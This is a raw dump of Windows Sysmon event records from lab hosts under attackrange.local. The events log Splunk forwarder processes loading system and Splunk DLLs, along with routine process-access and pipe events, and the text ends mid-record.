12:15:08.432{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057344078Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.432{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057344077Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.432{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057344076Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.432{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057344075Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.431{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057344074Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.431{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057344073Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.431{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057344072Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.431{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057344071Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.431{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057344070Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.431{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057344069Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.430{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057344068Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.430{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057344067Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.430{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057344066Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.430{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057344065Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.429{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057344064Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.429{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057344063Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.428{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057344062Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.427{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 734700x800000000000000057344061Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.427{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057344060Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.410{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057344059Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.410{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057344058Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.410{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x800000000000000057344057Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.410{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057344056Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.410{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057344055Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.410{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057344054Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.410{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057344053Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.410{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exeMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2trueSplunk, Inc.Valid 10341000x800000000000000057344052Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.410{8B6011A9-8868-6164-0500-00000000F101}424548C:\Windows\system32\csrss.exe{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057344051Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.410{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057344050Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.383{8B6011A9-5ACC-618E-32F3-04000000F101}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057344049Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:08.379{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344048Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:15:08.379{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x800000000000000057344047Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.379{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 18141800x800000000000000057344046Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:08.379{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344045Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:15:08.379{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 23542300x800000000000000057344044Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.379{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=997F61B4989E1DE04C0692F16DF78261,SHA256=088C24AE85E01830F72453FFAA5B3BF19065D31074C02D882B951058E3E743A1falsetrue 18141800x800000000000000057344043Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:08.379{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344042Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:15:08.379{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 534500x800000000000000057344041Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.010{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x800000000000000057344040Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.010{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057344039Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.010{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057344038Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.010{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 10341000x800000000000000021219225Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:08.278{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5ACC-618E-FBCD-08000000F101}1320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219224Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:08.278{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219223Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:08.278{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219222Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:08.278{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219221Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:08.278{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219220Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:08.278{AD5E2759-5432-6143-0500-00000000F101}412528C:\Windows\system32\csrss.exe{AD5E2759-5ACC-618E-FBCD-08000000F101}1320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219219Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:08.278{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5ACC-618E-FBCD-08000000F101}1320C:\Program 